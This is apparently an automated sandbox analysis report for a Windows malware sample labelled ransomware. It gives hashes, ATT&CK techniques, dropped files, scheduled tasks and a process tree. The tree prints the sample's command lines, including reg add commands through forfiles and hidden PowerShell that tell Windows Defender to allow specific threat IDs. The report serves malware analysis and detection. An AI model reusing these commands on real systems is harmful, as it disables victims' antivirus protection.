b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
24-05-2024 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
Size

6.7MB
MD5

f793b0bdfb3c06ba932dddffb5be9ad8
SHA1

b17c6d562c371f8140432354b4304ac4d03fe41f
SHA256

b9026fce43a810a6a6b216a2cf6d9a39e9cf265caac3b8c46de3a1bdef8a606d
SHA512

e587a085e39d6691b7ee55fda9581dd14fb175a619d5613a1370a5ae4bc661dfd8c6cbc82dbffb75787eb228778b88a8feddd1a9df83540ace73cbd15cf0d501
SSDEEP

196608:chjvlx3/aPRLJ5uuC49qd3rGC03XhzuxktD0:cdvb/wRLauu5GCWoxktD

Score

8^/10

discovery execution spyware stealer

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.EXE

pid process

1216 powershell.exe
3716 powershell.EXE

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops Chrome extension 2 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gimgggabfigedfmidfhmgaaccgefdfnj\1.0_0\manifest.json	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Drops file in System32 directory 3 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Drops file in Program Files directory 14 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

description	ioc	process
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\iBwvWTy.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\WEPOREuymMJJC\pHZVDCF.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\WEPOREuymMJJC\DycnJMJ.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{9A9F9ACC-B19C-4B66-8FE8-814016970733}.xpi	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\EkAcBLsehYBU2\VNWMwgr.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\EkAcBLsehYBU2\NcpbmrUiJGDNX.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\LjPBjCkxU\cbriGN.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\LjPBjCkxU\HNgTMFj.xml	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\wUkIgIyvDvCODvDfVpR\nsdhLIM.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File created	C:\Program Files (x86)\yyjtaGBLEqUn\rpprfmy.dll	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\RqexYqdylWmHLyb.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4220 3820 WerFault.exe 2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

4092 schtasks.exe
4864 schtasks.exe
5028 schtasks.exe
4880 schtasks.exe
1044 schtasks.exe
464 schtasks.exe
4064 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\RqexYqdylWmHLyb.job	schtasks.exe

pid	pid_target	process	target process
4220	3820	WerFault.exe	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

pid	process
4092	schtasks.exe
4864	schtasks.exe
5028	schtasks.exe
4880	schtasks.exe
1044	schtasks.exe
464	schtasks.exe
4064	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

pid	process
1216	powershell.exe
1216	powershell.exe
1996	powershell.exe
1996	powershell.exe
2792	powershell.exe
2792	powershell.exe
3716	powershell.EXE
3716	powershell.EXE
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1216	powershell.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	3716	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exeforfiles.execmd.exepowershell.exepowershell.execmd.exe

description	pid	process	target process
PID 3820 wrote to memory of 2800	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 3820 wrote to memory of 2800	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 3820 wrote to memory of 2800	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	cmd.exe
PID 2800 wrote to memory of 2364	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 2364	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 2364	2800	cmd.exe	forfiles.exe
PID 2364 wrote to memory of 2564	2364	forfiles.exe	cmd.exe
PID 2364 wrote to memory of 2564	2364	forfiles.exe	cmd.exe
PID 2364 wrote to memory of 2564	2364	forfiles.exe	cmd.exe
PID 2564 wrote to memory of 3728	2564	cmd.exe	reg.exe
PID 2564 wrote to memory of 3728	2564	cmd.exe	reg.exe
PID 2564 wrote to memory of 3728	2564	cmd.exe	reg.exe
PID 2800 wrote to memory of 1676	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 1676	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 1676	2800	cmd.exe	forfiles.exe
PID 1676 wrote to memory of 4416	1676	forfiles.exe	cmd.exe
PID 1676 wrote to memory of 4416	1676	forfiles.exe	cmd.exe
PID 1676 wrote to memory of 4416	1676	forfiles.exe	cmd.exe
PID 4416 wrote to memory of 4520	4416	cmd.exe	reg.exe
PID 4416 wrote to memory of 4520	4416	cmd.exe	reg.exe
PID 4416 wrote to memory of 4520	4416	cmd.exe	reg.exe
PID 2800 wrote to memory of 4988	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 4988	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 4988	2800	cmd.exe	forfiles.exe
PID 4988 wrote to memory of 2968	4988	forfiles.exe	cmd.exe
PID 4988 wrote to memory of 2968	4988	forfiles.exe	cmd.exe
PID 4988 wrote to memory of 2968	4988	forfiles.exe	cmd.exe
PID 2968 wrote to memory of 2708	2968	cmd.exe	reg.exe
PID 2968 wrote to memory of 2708	2968	cmd.exe	reg.exe
PID 2968 wrote to memory of 2708	2968	cmd.exe	reg.exe
PID 2800 wrote to memory of 4260	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 4260	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 4260	2800	cmd.exe	forfiles.exe
PID 4260 wrote to memory of 5092	4260	forfiles.exe	cmd.exe
PID 4260 wrote to memory of 5092	4260	forfiles.exe	cmd.exe
PID 4260 wrote to memory of 5092	4260	forfiles.exe	cmd.exe
PID 5092 wrote to memory of 1964	5092	cmd.exe	reg.exe
PID 5092 wrote to memory of 1964	5092	cmd.exe	reg.exe
PID 5092 wrote to memory of 1964	5092	cmd.exe	reg.exe
PID 2800 wrote to memory of 3216	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 3216	2800	cmd.exe	forfiles.exe
PID 2800 wrote to memory of 3216	2800	cmd.exe	forfiles.exe
PID 3216 wrote to memory of 4020	3216	forfiles.exe	cmd.exe
PID 3216 wrote to memory of 4020	3216	forfiles.exe	cmd.exe
PID 3216 wrote to memory of 4020	3216	forfiles.exe	cmd.exe
PID 4020 wrote to memory of 1216	4020	cmd.exe	powershell.exe
PID 4020 wrote to memory of 1216	4020	cmd.exe	powershell.exe
PID 4020 wrote to memory of 1216	4020	cmd.exe	powershell.exe
PID 1216 wrote to memory of 3228	1216	powershell.exe	gpupdate.exe
PID 1216 wrote to memory of 3228	1216	powershell.exe	gpupdate.exe
PID 1216 wrote to memory of 3228	1216	powershell.exe	gpupdate.exe
PID 3820 wrote to memory of 1996	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	powershell.exe
PID 3820 wrote to memory of 1996	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	powershell.exe
PID 3820 wrote to memory of 1996	3820	2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe	powershell.exe
PID 1996 wrote to memory of 3272	1996	powershell.exe	cmd.exe
PID 1996 wrote to memory of 3272	1996	powershell.exe	cmd.exe
PID 1996 wrote to memory of 3272	1996	powershell.exe	cmd.exe
PID 3272 wrote to memory of 3716	3272	cmd.exe	reg.exe
PID 3272 wrote to memory of 3716	3272	cmd.exe	reg.exe
PID 3272 wrote to memory of 3716	3272	cmd.exe	reg.exe
PID 1996 wrote to memory of 2680	1996	powershell.exe	reg.exe
PID 1996 wrote to memory of 2680	1996	powershell.exe	reg.exe
PID 1996 wrote to memory of 2680	1996	powershell.exe	reg.exe
PID 1996 wrote to memory of 4352	1996	powershell.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-24_f793b0bdfb3c06ba932dddffb5be9ad8_bkransomware.exe"
1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3820

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
- Suspicious use of WriteProcessMemory
PID:2800

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:2364

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2564

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:3728

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:4416

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:4520

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:4988

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:2968

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:2708

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
- Suspicious use of WriteProcessMemory
PID:4260

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
- Suspicious use of WriteProcessMemory
PID:5092

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:1964

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
- Suspicious use of WriteProcessMemory
PID:3216

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
- Suspicious use of WriteProcessMemory
PID:4020

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:3228

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1996

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
- Suspicious use of WriteProcessMemory
PID:3272

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:3716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:2680

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:4352

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:3248

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:928

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3088

C:\Windows\SysWOW64\reg.exe
